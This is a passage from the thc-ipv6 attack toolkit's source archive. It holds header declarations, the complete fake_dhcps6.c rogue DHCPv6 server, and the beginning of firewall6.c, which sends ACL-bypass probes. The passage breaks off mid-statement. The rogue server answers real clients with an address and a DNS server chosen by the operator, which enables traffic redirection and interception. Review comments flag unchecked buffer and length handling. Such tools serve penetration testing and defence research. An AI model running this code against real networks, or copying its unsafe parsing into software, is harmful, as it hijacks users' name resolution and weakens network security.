type, unsigned char *data, int data_len, int frag_len, int overlap_spoof_type); extern int thc_send_as_overlapping_last_fragment6(char *interface, unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int data_len, int frag_len, int overlap_spoof_type); extern unsigned char *thc_create_ipv6(char *interface, int *pkt_len, unsigned char *src, unsigned char *dst); extern unsigned char *thc_create_ipv6_extended(char *interface, int 
prefer, int *pkt_len, unsigned char *src, unsigned char *dst, int ttl, int length, int label, int class, int version); extern int thc_add_hdr_misc(unsigned char *pkt, int *pkt_len, unsigned char type, int len, unsigned char *buf, int buflen); extern int thc_add_hdr_route(unsigned char *pkt, int *pkt_len, unsigned char **routers, unsigned char routerptr); extern int thc_add_hdr_mobileroute(unsigned char *pkt, int *pkt_len, unsigned char *dst); extern int thc_add_hdr_oneshotfragment(unsigned char *pkt, int *pkt_len, unsigned int id); extern int thc_add_hdr_fragment(unsigned char *pkt, int *pkt_len, int offset, char more_frags, unsigned int id); extern int thc_add_hdr_dst(unsigned char *pkt, int *pkt_len, unsigned char *buf, int buflen); extern int thc_add_hdr_hopbyhop(unsigned char *pkt, int *pkt_len, unsigned char *buf, int buflen); extern int thc_add_hdr_nonxt(unsigned char *pkt, int *pkt_len, int hdropt); extern int thc_add_icmp6(unsigned char *pkt, int *pkt_len, int type, int code, unsigned int flags, unsigned char *data, int data_len, int checksum); extern int thc_add_pim(unsigned char *pkt, int *pkt_len, unsigned char type, unsigned char *data, int data_len); extern int thc_add_tcp(unsigned char *pkt, int *pkt_len, unsigned short int sport, unsigned short int dport, unsigned int sequence, unsigned int ack, unsigned char flags, unsigned short int window, unsigned short int urgent, char *option, int option_len, char *data, int data_len); extern int thc_add_udp(unsigned char *pkt, int *pkt_len, unsigned short int sport, unsigned short int dport, unsigned int checksum, char *data, int data_len); extern int thc_add_ipv4(unsigned char *pkt, int *pkt_len, int src, int dst); extern int thc_add_ipv4_extended(unsigned char *pkt, int *pkt_len, int src, int dst, unsigned char tos, int id, unsigned char ttl); extern int thc_add_ipv4_rudimentary(unsigned char *pkt, int *pkt_len, int src, int dst, int port); extern int thc_add_data6(unsigned char *pkt, int *pkt_len, unsigned 
char type, unsigned char *data, int data_len); extern int thc_generate_and_send_pkt(char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *pkt, int *pkt_len); extern int thc_generate_pkt(char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *pkt, int *pkt_len); extern int thc_send_pkt(char *interface, unsigned char *pkt, int *pkt_len); extern unsigned char *thc_destroy_packet(unsigned char *pkt); extern int thc_open_ipv6(); extern int thc_is_dst_local(char *interface, unsigned char *dst); extern int checksum_pseudo_header(unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int length); extern int calculate_checksum(unsigned char *data, int data_len); extern void thc_dump_data(unsigned char *buf, int len, char *text); extern unsigned char *thc_ipv62string(unsigned char *ipv6); extern unsigned char *thc_string2ipv6(unsigned char *string); extern unsigned char *thc_string2notation(unsigned char *string); extern unsigned char *thc_ipv62notation(unsigned char *string); extern unsigned char *thc_memstr(char *haystack, char *needle, int haystack_length, int needle_length); extern void thc_notation2beauty(unsigned char *ipv6); extern int thc_bind_udp_port(int port); extern int thc_bind_multicast_to_socket(int s, char *interface, char *src); #define DO_CHECKSUM 0xfaf4 #define NXT_IP6 41 #define NXT_IPV6 41 #define NXT_INVALID 128 #define NXT_IGNORE 31 #define NXT_HDR 0 #define NXT_HOP 0 #define NXT_HBH 0 #define NXT_ROUTE 43 #define NXT_FRAG 44 #define NXT_NONXT 59 #define NXT_OPTS 60 #define NXT_DST 60 #define NXT_ESP 50 #define NXT_AH 51 #define NXT_MIPV6 135 #define NXT_MOBILITY 135 #define NXT_PIM 103 #define NXT_ICMP6 58 #define NXT_TCP 6 #define NXT_UDP 17 #define NXT_DATA 255 #define NXT_HOSTID 139 #define NXT_HOSTIDENTIFICATION 139 #define NXT_SHIM 140 #define NXT_SHIM6 140 #define NXT_IP4 4 #define NXT_IPV4 4 #define NXT_IP4_RUDIMENTARY 0xf4 #define NXT_IPV4_RUDIMENTARY 0xf4 #define NXT_IPIP 
4 #define NXT_ICMP4 1 #define IPV6_FRAME_TYPE 0x86dd #define TCP_CWR 128 #define TCP_ECN 64 #define TCP_URG 32 #define TCP_ACK 16 #define TCP_PSH 8 #define TCP_RST 4 #define TCP_SYN 2 #define TCP_FIN 1 typedef struct { unsigned char dst[6]; unsigned char src[6]; unsigned int type:16; } thc_ethernet; typedef struct { unsigned char *pkt; int pkt_len; char *next_segment; char *final; int final_type; unsigned int version; // :4; unsigned char class; unsigned int label; // :20; unsigned int length; // :16; unsigned char next; unsigned char ttl; unsigned char src[16]; unsigned char dst[16]; unsigned char *final_dst; unsigned char *original_src; } thc_ipv6_hdr; typedef struct { char *next_segment; unsigned char next; unsigned char length; unsigned char *data; int data_len; } thc_ipv6_ext_hdr; typedef struct { unsigned char type; unsigned char code; unsigned int checksum:16; unsigned int flags; unsigned char *data; int data_len; } thc_icmp6_hdr; typedef struct { unsigned short int sport; unsigned short int dport; unsigned int sequence; unsigned int ack; unsigned char length; unsigned char flags; unsigned short int window; unsigned short int checksum; unsigned short int urgent; unsigned char *option; int option_len; unsigned char *data; int data_len; } thc_tcp_hdr; typedef struct { unsigned short int sport; unsigned short int dport; unsigned short int length; unsigned short int checksum; unsigned char *data; int data_len; } thc_udp_hdr; typedef struct { unsigned char ver_hlen; unsigned char tos; unsigned short int size; unsigned short int id; unsigned short int frag; unsigned char ttl; unsigned char proto; unsigned short int checksum; unsigned int src; unsigned int dst; } thc_ipv4_hdr; typedef struct { char *next_segment; char dummy[8]; } thc_dummy_hdr; /* typedef struct { unsigned int nlmsg_len; unsigned short nlmsg_type; unsigned short nlmsg_flags; unsigned int nlmsg_seq; unsigned int nlmsg_pid; } nlmsghdr; typedef struct { unsigned char rtgen_family; } rtgenmsg; typedef 
struct { nlmsghdr nlh; rtgenmsg g; } neigh_req; typedef struct { unsigned short nl_family; unsigned short nl_pad; unsigned int nl_pid; unsigned int nl_groups; } sockaddr_nl; */

#ifdef _HAVE_SSL
/* Option structures compiled only with _HAVE_SSL; each starts with a type byte and a len byte. */
typedef struct {
  unsigned char type;
  unsigned char len;
  unsigned char pad_len;
  unsigned char resv;
  /* cga params */
  unsigned char modifier[16];
  unsigned char prefix[8];
  unsigned char collision_cnt;
  unsigned char coll2;
  unsigned char *pub_key;
  unsigned char *exts;
  /* end of cga params */
  unsigned char *pad;
} thc_cga_hdr;

typedef struct {
  unsigned char type;
  unsigned char len;
  unsigned char resv[6];
  unsigned long long timeval;
} thc_timestamp_hdr;

typedef struct {
  unsigned char type;
  unsigned char len;
  char nonce[6];
} thc_nonce_hdr;

typedef struct {
  unsigned char type;
  unsigned char len;
  short int resv;
  unsigned char key_hash[16];
  char *sign;
  char *pad;
} thc_rsa_hdr;

typedef struct {
  RSA *rsa;
  int len;
} thc_key_t;

typedef struct {
  unsigned char *data; /* DER-encoded key length */
  int len;
} opt_t;

extern thc_key_t *thc_generate_key(int key_len);
extern thc_cga_hdr *thc_generate_cga(unsigned char *prefix, thc_key_t * key, unsigned char **cga);
extern int thc_add_send(unsigned char *pkt, int *pkt_len, int type, int code, unsigned int flags, unsigned char *data, int data_len, thc_cga_hdr * cga_hdr, thc_key_t * key, unsigned char *tag, int checksum);
#endif

#endif
thc-ipv6-2.5/fake_dhcps6.c0000644000000000000000000002656412251022435014050 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

/*
 * fake_dhcps6.c
 *
 * The line above is the archive member header followed by this file's include
 * list; the header names inside the angle brackets were lost when the page was
 * extracted.
 *
 * The program binds 547/udp, joins ff02::1:2 and ff02::1:3, and answers DHCPv6
 * client messages of type 1 and 3-6 with an Advertise (2) or Reply (7) that
 * carries the DNS server given on the command line and, for a Solicit, an
 * address taken from the given prefix. The byte layout it follows is described
 * in the comment at the end of main().
 *
 * Replies of this kind come from a host port rather than from the site's DHCPv6
 * server; DHCPv6-Shield (RFC 7610) is the layer-2 filter defined for that case.
 */

/* Print the usage text for program name `prg` and terminate with exit(-1). */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s interface network-address/prefix-length dns-server [dhcp-server-ip-address [mac-address]]\n\n", prg);
  printf("Fake DHCPv6 server. Use to configure an address and set a DNS server\n");
  exit(-1);
}

/*
 * Entry point: validate the arguments, prepare the fixed server-id and DNS
 * options in mybuf, then loop forever on recvmsg() and answer each request.
 * The loop never ends, so the final return is not reached.
 */
int main(int argc, char *argv[]) {
  char *routerip, *interface, mac[16] = "";
  char rdatabuf[1024], wdatabuf[1024], cmsgbuf[1024], mybuf[1024];
  unsigned char *routerip6, *mac6 = mac, *ip6, *ptr, *ptr1, *ptr2, *ptr3;
  unsigned char *dns;
  int size, fromlen = 0, /*mtu = 1500, */ i, j, k, l, m, s, len, t, mlen, csize = 0;
  static struct iovec iov;
  struct sockaddr_storage from;
  struct msghdr mhdr;
  struct sockaddr_in6 ddst;
  unsigned long long int count = 0;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL)
    printf("WARNING: %s is not working with injection!\n", argv[0]);

  if (strcmp(argv[1], "-r") == 0) { // is ignored
    argv++;
    argc--;
  }

  memset(mac, 0, sizeof(mac));
  interface = argv[1];
  if (thc_get_own_mac(interface) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  /*
   * NOTE(review): each %x stores a whole unsigned int through a pointer into a
   * char array, so every store also writes the bytes after the addressed
   * element, and the byte that lands in mac[n] depends on byte order.
   */
  if (argc >= 6 && (ptr = argv[5]) != NULL)
    sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]);
  else
    mac6 = thc_get_own_mac(interface);
  if (argc >= 5 && argv[4] != NULL)
    ip6 = thc_resolve6(argv[4]);
  else
    ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  if (argc >= 4 && argv[3] != NULL)
    dns = thc_resolve6(argv[3]);
  else
    dns = thc_resolve6("ff02::fb");

  /* split "address/prefixlen" in place */
  routerip = argv[2];
  if ((ptr = index(routerip, '/')) == NULL) {
    printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
  }
  /*
   * NOTE(review): the error branch above does not exit, so ptr is NULL here
   * when the argument contains no '/'.
   */
  *ptr++ = 0;
  size = atoi(ptr);

  routerip6 = thc_resolve6(routerip);
  if (routerip6 == NULL || size < 1 || size > 128) {
    fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[2]);
    exit(-1);
  }
  if (size < 64) {
    fprintf(stderr, "Warning: network prefix must be a minimum of /64, resizing to /64\n");
    size = 64;
  }
  if (size % 8 > 0) {
    size = ((size / 8) + 1) * 8;
    /* NOTE(review): csize is still 0 at this point (it is assigned on the next statement), so this prints /0 */
    fprintf(stderr, "Warning: prefix must be a multiple of 8, resizing to /%d\n", csize * 8);
  }
  /* csize: number of trailing address bytes that are overwritten with the counter below */
  csize = 8 - ((size - 64) / 8);
  if (dns == NULL) {
    fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[3]);
    exit(-1);
  }
  if (ip6 == NULL) {
    fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[4]);
    exit(-1);
  }
/*
  if (mtu < 1 || mtu > 65536) {
    fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[5]);
    exit(-1);
  }
  if (mtu < 1228 || mtu > 1500)
    fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu);
*/
  if (mac6 == NULL) {
    fprintf(stderr, "Error: mac address in invalid\n");
    exit(-1);
  }

  /* s: listening socket on the DHCPv6 server port; t: separate socket used for replies */
  if ((s = thc_bind_udp_port(547)) < 0) {
    fprintf(stderr, "Error: could not bind to 547/udp\n");
    exit(-1);
  }
  if (thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:2")) < 0 || thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:3")) < 0) {
    fprintf(stderr, "Error: could not bind multicast address\n");
    exit(-1);
  }
  if ((t = socket(AF_INET6, SOCK_DGRAM, 0)) < 0) {
    perror("Error:");
    exit(-1);
  }

  /*
   * mybuf holds two prebuilt options that are appended to replies:
   *   bytes 0-17 : option code 2, length 14, then 00 01 00 01, 4 time bytes
   *                (filled in per reply) and the 6-byte MAC
   *   bytes 18-37: option code 23, length 16, then the DNS server address
   */
  memset(mybuf, 0, sizeof(mybuf));
  mybuf[1] = 2;
  mybuf[3] = 14;
  mybuf[5] = 1;
  mybuf[7] = 1;
  // mybuf + 8 == time
  memcpy(mybuf + 12, mac6, 6);
  mlen = 18;
  mybuf[mlen + 1] = 23;
  mybuf[mlen + 3] = 16;
  memcpy(mybuf + mlen + 4, dns, 16);
  mlen += 20;

  printf("Starting to fake dhcp6 server on %s for %s (Press Control-C to end) ...\n\n", interface, argv[2]);
  while (1) {
    memset((char *) &from, 0, sizeof(from));
    memset(&iov, 0, sizeof(iov));
    memset(&mhdr, 0, sizeof(mhdr));
    iov.iov_base = rdatabuf;
    iov.iov_len = sizeof(rdatabuf);
    mhdr.msg_name = &from;
    mhdr.msg_namelen = sizeof(from);
    mhdr.msg_iov = &iov;
    mhdr.msg_iovlen = 1;
    mhdr.msg_control = (caddr_t) cmsgbuf;
    mhdr.msg_controllen = sizeof(cmsgbuf);
    if ((len = recvmsg(s, &mhdr, 0)) > 0) {
      fromlen = mhdr.msg_namelen;
      if (debug)
        thc_dump_data(rdatabuf, len, "Received Packet");
      /* the reply goes back to the sender's address */
      ddst.sin6_addr = ((struct sockaddr_in6 *) mhdr.msg_name)->sin6_addr;
      ptr2 = thc_ipv62notation((char *) &ddst.sin6_addr);
      /* byte 0 is the DHCPv6 message type; ptr1 is only used for the log line */
      switch (rdatabuf[0]) {
      case 1:
        ptr1 = "Solicitate";
        break;
      case 2:
        ptr1 = "Advertise (illegal, ignored)";
        break;
      case 3:
        ptr1 = "Request";
        break;
      case 4:
        ptr1 = "Confirm";
        break;
      case 5:
        ptr1 = "Renew";
        break;
      case 6:
        ptr1 = "Rebind";
        break;
      case 7:
        ptr1 = "Reply (illegal, ignored)";
        break;
      case 8:
        ptr1 = "Release (ignored)";
        break;
      case 9:
        ptr1 = "Decline (ignored)";
        break;
      case 10:
        ptr1 = "Reconfigure (illegal, ignored)";
        break;
      case 11:
        ptr1 = "Information Request (ignored)";
        break;
      case 12:
        ptr1 = "Relay Forward (ignored)";
        break;
      case 13:
        ptr1 = "Relay Reply (ignored)";
        break;
      default:
        ptr1 = "Unknown (ignored)";
        break;
      }
      printf("Received DHCP6 %s packet from %s\n", ptr1, ptr2);
      free(ptr2);

      /* only types 1 and 3-6 are answered */
      if (rdatabuf[0] >= 1 && rdatabuf[0] < 7 && rdatabuf[0] != 2) {
        memset(wdatabuf, 0, sizeof(wdatabuf));
        memcpy(wdatabuf + 1, rdatabuf + 1, 3); /* copy bytes 1-3 of the request */
        /* i: write offset in wdatabuf, j: read offset in rdatabuf, both past the 4-byte header */
        i = j = 4;
        k = -1;
        if (rdatabuf[0] == 1) { // initial request
          wdatabuf[0] = 2;
          /*
           * Walk the options (2-byte code, 2-byte length, data).
           * NOTE(review): rdatabuf is plain char, so where char is signed a
           * length byte >= 0x80 makes l negative, and the l + j + 4 > len test
           * does not reject a negative l. Nothing in this loop or after it
           * bounds i against sizeof(wdatabuf) before the fixed-size options
           * below are appended.
           */
          while ((j + 4) < len) {
            l = rdatabuf[j + 2] * 256 + rdatabuf[j + 3];
            if (l + j + 4 > len) {
              l = 0;
              j = len;
              printf("Info: received evil packet\n");
            } else {
              if (rdatabuf[j + 1] == 1) {
                /* option 1 is copied back unchanged */
                memcpy(wdatabuf + i, rdatabuf + j, l + 4);
                i += l + 4;
              } else if (rdatabuf[j + 1] == 3) {
                k = j; // just set a pointer
              }
              j += l + 4;
            }
          }
          // add 02, 23
          j = time(NULL);
          memcpy(mybuf + 8, (char *) &j + _TAKE4, 4);
          memcpy(wdatabuf + i, mybuf, mlen);
          i += mlen;
          // now expand 3
          if (k > -1 && rdatabuf[k + 3] == 12 && rdatabuf[k + 2] == 0) { // copy structure
            memcpy(wdatabuf + i, rdatabuf + k, 16);
          } else { // or create new
            wdatabuf[i + 1] = 3;
            memcpy(wdatabuf + i + 4, (char *) &j + _TAKE4, 4); // copy time as IAID
          }
          /* option 3: length 40, then two 4-byte timer fields set to 00 00 7f 00 and 00 00 fe 00 */
          wdatabuf[i + 3] = 40;
          memset(wdatabuf + i + 8, 0, 8);
          wdatabuf[i + 10] = 0x7f;
          wdatabuf[i + 14] = 0xfe;
          i += 16;
          /* nested option 5: length 24, 16-byte address, two 4-byte lifetimes */
          wdatabuf[i + 1] = 5;
          wdatabuf[i + 3] = 24;
          memcpy(wdatabuf + i + 4, routerip6, 16); // address
          count++;
          if (csize > 0)
            memcpy(wdatabuf + i + 4 + 16 - csize, (char *) &count, csize); // counter
          ptr3 = thc_ipv62notation(wdatabuf + i + 4);
          wdatabuf[i + 21] = 2;
          wdatabuf[i + 25] = 2;
          i += 28;
        } else {
          wdatabuf[0] = 7;
          m = 0;
          /* NOTE(review): the same signed-length and wdatabuf-bound remarks as in the loop above apply here */
          while ((j + 4) < len) {
            l = rdatabuf[j + 2] * 256 + rdatabuf[j + 3];
            if (l + j + 4 > len) {
              l = 0;
              j = len;
              printf("Info: received evil packet\n");
            } else {
              // just copy types 1-3 and 23
              if ((rdatabuf[j + 1] >= 1 && rdatabuf[j + 1] <= 3) || rdatabuf[j + 1] == 23) {
                memcpy(wdatabuf + i, rdatabuf + j, l + 4);
                i += l + 4;
                if (rdatabuf[j + 1] == 23)
                  k = 1;
                if (rdatabuf[j + 1] == 3)
                  m = 1;
              }
              j += l + 4;
            }
          }
          /* the request carried no option 23: append the prebuilt DNS option */
          if (k == -1) {
            memcpy(wdatabuf + i, mybuf + 18, 20);
            i += 20;
          }
        }
        len = i;
        if (debug)
          thc_dump_data(wdatabuf, len, "Reply Packet");
        ddst.sin6_family = AF_INET6;
        ddst.sin6_port = htons(546);
        //ddst.sin6_addr = ((struct sockaddr_in6 *)mhdr.msg_name)->sin6_addr;
        ddst.sin6_scope_id = ((struct sockaddr_in6 *) mhdr.msg_name)->sin6_scope_id;
        if (sendto(t, wdatabuf, len, 0, (struct sockaddr *) &ddst, sizeof(ddst)) < 0)
          perror("Error:");
        else {
          ptr2 = thc_ipv62notation((char *) &ddst.sin6_addr);
          if (wdatabuf[0] == 2) {
            printf("Sent DHCP6 Advertise packet to %s (offer: %s)\n", ptr2, ptr3);
            free(ptr3);
          } else if (m)
            printf("Sent DHCP6 Reply packet to %s (address accepted)\n", ptr2);
          else
            printf("Sent DHCP6 Reply packet to %s (did not set address)\n", ptr2);
          free(ptr2);
        }
      }
    }
  }

/*
  packet structure:
    1 byte  = type
    3 bytes = sessionid
    while(packet data) {
      2 bytes = type
      2 bytes = length in bytes of following data
      ... defined fixed length data ...
    }

  server listen on ff02::1:2 udp 547
  client connects from linklocal port 546, ttl 1
    01 = solicit
    3 bytes = sessionid
    6 bytes = blog (elapsed, 8)
    8 bytes = 01 blob (client id + time + mac)
      4 bytes = time
      6 bytes = mac
    16 bytes = 03 blob (want perm address)
    5 + length + hostname = hostname
    18 bytes = blob (vendor class, type 16)
    12 bytes = blob (requested options, type 6)

  server sends to linklocal (respect client port), ttl 1
    02 = advertise
    3 bytes = sessionid (copy)
    18 bytes = 01 blob (client copy of client-id)
    8 bytes = 02 blob (server id + time + mac)
      4 bytes = time
      6 bytes = mac
    0003 = give perm address
      2 bytes = length
      4 bytes = IAID (from client request!)
      4 bytes = validity time 1 (1800)
      4 bytes = validity time 2 (2880)
      0005 = address structure
        2 bytes = length (24 bytes)
        16 bytes = address
        4 bytes = validity time (3600)
        4 byte = validity time (same)
    0023 = dns option
      2 bytes = length (16 bytes)
      16 bytes = dns server address

  client sends to ff02::1:2 !
    03 = request
    3 bytes = sessionid
    6 bytes = blog (elapsed, 8)
    8 bytes = 01 blob (client id + time + mac)
      4 bytes = time
      6 bytes = mac
    18 bytes = client (again)
    18 bytes = server (copy)
    44 bytes = address (copy)
    5 + length + hostname = hostname (again)
    18 bytes = blob again (vendor class, type 16)
    12 bytes = blob again (requested options, type 6)

  server replies
    7 = reply
    copy original advertise packet :-)
*/

  return 0; // never reached
}
thc-ipv6-2.5/firewall6.c0000644000000000000000000020031612251022436013554 0ustar rootroot/*
 * Tests the implementation of ACLs for bypassing attacks
 *
 */

#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

extern int do_6in4;
extern int do_pppoe;
extern int do_hdr_vlan;
extern int do_hdr_off;

int sports[] = { 20, 21, 22, 25, 53, 80, 111, 123, 179, 443, 8080, -1 } ;
int sports2[] = { 20, 53, 67, 68, 69, 111, 123, 161, 162, 2049, -1 } ;
int matched = 0, port = -1, udp = 0, sport = 21000, cport, count = 0, poffset, poffset2,
ptype, only = 0, pingtest = 0, do_hop = 0;
unsigned char *dst, *psrc, is_srcport = 0;
pcap_t *p;

/* Print the usage text for program name `prg` and terminate with exit(-1). */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s [-Hu] interface destination port [test-case-no]\n\n", prg);
  printf("Performs various ACL bypass attempts to check implementations.\n");
  printf("Defaults to TCP ports, option -u switches to UDP.\nOption -H prints the hop count.\n");
  printf("For all test cases to work, ICMPv6 ping to the destination must be allowed.\n");
  exit(-1);
}

/* pcap callback that discards the frame; main() uses it to drain the capture before a test. */
void ignoreit(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  return;
}

/*
 * pcap callback that classifies one captured frame as an answer to the current
 * test case and prints what it saw.
 *
 * Result is left in the global `matched`: it is set to -1 on entry and to 1
 * when the frame is recognised as a reply (TCP segment, ICMPv6 unreachable /
 * parameter problem quoting the probe, or echo reply when pingtest is set).
 *
 * foo    - unused
 * header - pcap record header; only caplen is read
 * data   - captured frame, assumed to start with a 14-byte Ethernet header
 *          unless do_hdr_size is set
 *
 * NOTE(review): ptr[0], ptr[nxt], ptr[40 + offset] and the 16 bytes at ptr + 8
 * are read before, or without, a comparison against len, so a short capture is
 * indexed past caplen.
 */
void check_packet(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  unsigned char *ptr = (unsigned char *) (data + 14);
  int len = header->caplen - 14, nxt = 6, offset = 0; /* nxt: index of the byte holding the next-header value */
  unsigned short int rsport, rdport;

  matched = -1;
  if (do_hdr_size) {
    ptr = (unsigned char *) (data + do_hdr_size);
    len -= (do_hdr_size - 14);
    if ((ptr[0] & 240) != 0x60) /* version nibble must be 6 */
      return;
  }

  /* one fragment header directly after the IPv6 header: payload starts 8 bytes later */
  if (ptr[nxt] == NXT_FRAG) {
    offset += 8;
    nxt = 40;
  }

  /* TCP from the destination: ports at payload bytes 0-3, flag byte at payload byte 13 */
  if (udp == 0 && ptr[nxt] == NXT_TCP && memcmp(dst, ptr + 8, 16) == 0 && len >= 60 + offset) {
    rsport = ptr[40 + offset] * 256 + ptr[41 + offset];
    rdport = ptr[42 + offset] * 256 + ptr[43 + offset];
    //printf("rsport: %d, rdport: %d, sport %d, port %d, count %d\n", rsport, rdport, sport, port, count);
    if ((is_srcport == 1 || rdport == sport + count) && rsport == port) {
      if (do_hop)
        printf("[%d] ", ptr[7]); /* hop limit of the reply */
      printf("TCP");
      if ((ptr[53 + offset] & 1) > 0)
        printf("-FIN");
      if ((ptr[53 + offset] & 2) > 0)
        printf("-SYN");
      if ((ptr[53 + offset] & 4) > 0)
        printf("-RST");
      if ((ptr[53 + offset] & 16) > 0)
        printf("-ACK");
      printf(" received\n");
      matched = 1;
    }
    // else printf("DEBUG: different tcp pkt seen from target (is_srcport %d, rdport %d == sport %d + count %d, rsport %d == port %d)\n", is_srcport, rdport, sport, count, rsport, port);
  }

  /*
   * UDP from the destination.
   * NOTE(review): unlike the TCP branch this one never sets matched = 1, so
   * check_for_reply() still ends in "FAILED - no reply" after "UDP received"
   * was printed.
   */
  if (udp == 1 && ptr[nxt] == NXT_UDP && memcmp(dst, ptr + 8, 16) == 0 && len >= 48 + offset) {
    rsport = ptr[40 + offset] * 256 + ptr[41 + offset];
    rdport = ptr[42 + offset] * 256 + ptr[43 + offset];
    if ((is_srcport == 1 || rdport == sport + count) && rsport == port) {
      if (do_hop)
        printf("[%d] ", ptr[7]);
      printf("UDP received\n");
    }
  }

  /*
   * ICMPv6 error that quotes the probe: the quoted IPv6 header starts at byte
   * 48 (40-byte outer header + 8-byte ICMPv6 header), so 54 is its next-header
   * byte, 72 its destination address and 88 the start of its payload.
   * poffset/poffset2/ptype are globals set by the test case in main() to
   * describe the extension headers the probe carried.
   */
  if (ptr[nxt] == NXT_ICMP6 && (ptr[40 + offset] == ICMP6_UNREACH || ptr[40 + offset] == ICMP6_PARAMPROB) && len >= 96 + poffset + offset) {
    if (memcmp(dst, ptr + 72 + offset, 16) != 0)
      return;
    if (ptype >= 0) {
      if (ptype == NXT_FRAG && poffset == 0) {
        if (ptr[54 + offset] != NXT_FRAG && ptr[54 + offset] != NXT_DST)
          return;
      } else {
        if (ptr[54 + offset] != ptype)
          return;
        if (udp == 0 && ptr[54 + poffset2 + offset] != NXT_TCP)
          return;
        if (udp == 1 && ptr[54 + poffset2 + offset] != NXT_UDP)
          return;
      }
    } else {
      if (udp == 0 && ptr[54 + offset] != NXT_TCP)
        return;
      if (udp == 1 && ptr[54 + offset] != NXT_UDP)
        return;
    }
    /* ports of the quoted probe: its source must be ours, its destination the tested port */
    rsport = ptr[88 + poffset + offset] * 256 + ptr[89 + poffset + offset];
    rdport = ptr[90 + poffset + offset] * 256 + ptr[91 + poffset + offset];
    if ((ptype == NXT_FRAG && poffset == 0) || ((rsport == sport + count || is_srcport == 1) && rdport == port)) {
      matched = 1;
      if (do_hop)
        printf("[%d] ", ptr[7]);
      printf("ICMPv6 ");
      if (ptr[40 + offset] == ICMP6_PARAMPROB) {
        printf("Parameter Problem received\n");
        return;
      }
      /* ICMPv6 code byte of the unreachable message */
      switch(ptr[41 + offset]) {
      case 0:
        printf("Route");
        break;
      case 1:
        printf("Firewall");
        break;
      case 2:
        printf("Out-Of-Scope");
        break;
      case 3:
        printf("Address");
        break;
      case 4:
        printf("Port");
        break;
      case 5:
        printf("Ingress/Egress");
        break;
      case 6:
        printf("Reject");
        break;
      default:
        printf("unknown");
      }
      printf(" unreachable received\n");
    }
  } else if (ptr[nxt] == NXT_ICMP6 && ptr[40 + offset] == ICMP6_ECHOREPLY && pingtest) {
    matched = 1;
    if (do_hop)
      printf("[%d] ", ptr[7]);
    printf("ICMPv6 Echo Reply");
  }
}

/*
 * Poll the capture handle `p` with check_packet() until a frame is recognised
 * (matched == 1) or more than three seconds have passed, then report a missing
 * reply. A frame that check_packet() looked at but did not recognise
 * (matched == -1) resets matched to 0 and polling continues. After a match the
 * function sleeps one second unless a single test case was selected (only != 0).
 */
void check_for_reply() {
  int ret = -1;
  time_t t;

  t = time(NULL);
  matched = 0;
  while (ret < 0) {
    usleep(10);
    thc_pcap_check(p, (char *) check_packet, NULL);
    if (matched == -1) {
      ret = -1;
      matched = 0;
    } else if (matched == 1)
      ret = 0;
    if (time(NULL) > t + 3 && ret < 0)
      ret = 0;
  }
  if (matched == 0)
    printf("FAILED - no reply\n");
  else if (only == 0)
    sleep(1);
}

int main(int argc, char *argv[]) {
  int i, curr = 0;
  unsigned char buf[3000], ch;
  unsigned char *src, string[64] = "ip6 and not src ";
  unsigned char *srcmac = NULL, *dstmac = NULL;
  thc_ipv6_hdr *hdr, *hdr3;
  int offset = 14;
  unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
  int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0;
  char *interface;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "uH")) >= 0) {
    switch (i) {
    case 'u':
      udp = 1;
      break;
    case 'H':
      do_hop = 1;
      break;
    default:
      fprintf(stderr, "Error: invalid option -%c\n", i);
      exit(-1);
    }
  }

  if (argc - optind < 3)
    help(argv[0]);

  if (do_hdr_size)
    offset = do_hdr_size;
  interface = argv[optind];
  dst = thc_resolve6(argv[optind + 1]);
  port = atoi(argv[optind + 2]);
  if (argc - optind > 3 && argv[optind + 3] != NULL)
    only = atoi(argv[optind + 3]);
  if ((src = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL)) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  srcmac = thc_get_own_mac(interface);
  if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) {
    fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
    exit(-1);
  }

  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  strcat(string, thc_ipv62notation(src));
  memset(buf, 0, sizeof(buf));

  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  printf("Starting firewall6: mode %s against %s port %d\n", udp == 0 ?
